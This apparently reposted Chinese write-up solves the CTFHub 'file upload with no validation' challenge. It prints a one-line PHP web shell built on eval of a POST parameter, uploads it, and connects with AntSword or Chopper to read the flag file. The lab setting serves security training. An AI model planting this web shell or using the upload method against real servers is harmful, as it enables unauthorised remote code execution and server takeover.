ctfhub技能树—文件上传—无验证
Posted anweilx
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ctfhub技能树—文件上传—无验证相关的知识,希望对你有一定的参考价值。
打开靶机
查看页面信息
编写一句话木马
<?php
echo "123";
@eval(@$_POST['a']);
?>
上传木马
上传成功,并拿到相对路径地址
查看页面信息
使用蚁剑或菜刀连接
查看目录信息
查看flag_368114112.php文件信息
成功拿到flag
以上是关于ctfhub技能树—文件上传—无验证的主要内容,如果未能解决你的问题,请参考以下文章